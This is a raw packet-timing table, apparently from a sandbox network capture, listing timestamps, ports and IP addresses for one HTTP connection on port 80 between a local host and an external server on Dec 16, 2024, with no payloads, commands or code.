Dec 16, 2024 11:03:16.857695103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.857819080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.857894897 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.861968994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.862026930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.862052917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.862082005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.865946054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.866003036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.866020918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.866050959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.869527102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.869558096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.869602919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.869623899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.873704910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.873776913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.873934984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.874046087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.876450062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.876496077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.876617908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.876777887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.879658937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.879713058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.879826069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.879873991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.882873058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.882932901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.883050919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.883107901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.886091948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.886261940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.886284113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.886308908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.889353037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.889369011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.889401913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.889473915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.892658949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.892684937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.892772913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.892772913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.895461082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.895554066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.895626068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.895677090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.898900032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.898957014 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.898976088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.899003983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.901803970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.901842117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.901871920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.902005911 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.905046940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.905103922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.905199051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.905199051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.907648087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.907697916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.907753944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.912143946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.912200928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.912230015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.912255049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.913346052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.913383007 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.913439035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.913439035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.914616108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.914680958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.914743900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.914853096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.916485071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.916548967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.916598082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.916646957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.918386936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.918447971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.918476105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.918565035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.920339108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.920443058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.920454025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.920540094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.921886921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.921945095 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.922063112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.922269106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.923687935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.923806906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.923826933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.923855066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.925517082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.925570011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.925578117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.925616980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.927331924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.927414894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.927455902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.927520037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.929083109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.929167032 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.929182053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.929241896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.929250956 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.930855989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.930919886 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.930968046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.931082010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.932727098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.932813883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.932867050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.933104038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.934531927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.934601068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.934659004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.934727907 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.936336040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.936491013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.936526060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.936548948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.938146114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.938265085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.938329935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.939934969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.939987898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.940006018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.940057993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.941741943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.941813946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.941909075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.941972017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.943558931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.943629026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.943694115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.943747044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.945379972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.945432901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.945499897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.945552111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.947173119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.947278976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.947359085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.948999882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.949120998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.949191093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.950778961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.950843096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:16.950871944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:16.950927019 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.046473026 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.046580076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.046778917 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.046845913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.047363997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.047420025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.047421932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.047478914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.049112082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.049199104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.049237013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.049284935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.050911903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.050956011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.050976038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.051003933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.052725077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.052782059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.052807093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.052855968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.054539919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.054594994 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.054641008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.054697990 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.056350946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.056406021 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.056444883 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.056494951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.058149099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.058212996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.058262110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.058320045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.059990883 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.060058117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.060116053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.060220957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.061605930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.061667919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.061675072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.061731100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.063226938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.063288927 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.063292980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.063353062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.065361977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.065463066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.065526962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.065582037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.066746950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.066817045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.066823006 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.066876888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.068063021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.068128109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.068176031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.068231106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.069629908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.069694996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.069758892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.069811106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.071147919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.071211100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.071240902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.071296930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.072691917 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.072755098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.072802067 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.072854996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.074132919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.074187994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.074188948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.074244022 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.075639963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.075704098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.075762987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.075817108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.077116013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.077259064 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.077281952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.077326059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.078608990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.078669071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.078671932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.078720093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.080091000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.080153942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.080198050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.080254078 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.081545115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.081603050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.081676960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.081727982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.083003044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.083061934 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.083127022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.083215952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.084511995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.084568977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.084651947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.084708929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.085973024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.086030960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.086180925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.086232901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.087414980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.087471962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.087512016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.087563992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.088877916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.088936090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.088951111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.089008093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.090389013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.090451956 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.090517044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.090569973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.091805935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.091902971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.091962099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.092012882 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.093343973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.093403101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.093472004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.093528986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.094784975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.094840050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.094955921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.095005989 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.096306086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.096370935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.096380949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.096435070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.097760916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.097817898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.097898960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.097950935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.099211931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.099271059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.099328995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.099385023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.100728989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.100848913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.100863934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.100910902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.102196932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.102261066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.102303982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.102358103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.103745937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.103805065 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.103868961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.103918076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.105087996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.105142117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.105143070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.105187893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.106583118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.106652975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.106760025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.106813908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.108036041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.108098030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.108155012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.108475924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.109507084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.109569073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.109626055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.109680891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.111013889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.111116886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.111125946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.111166000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.112472057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.112531900 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.112596989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.112652063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.113924980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.113984108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.114036083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.114095926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.115468025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.115503073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.115571976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.115571976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.116900921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.116966963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.117010117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.117064953 CET	49800	80	192.168.2.5	31.41.244.11
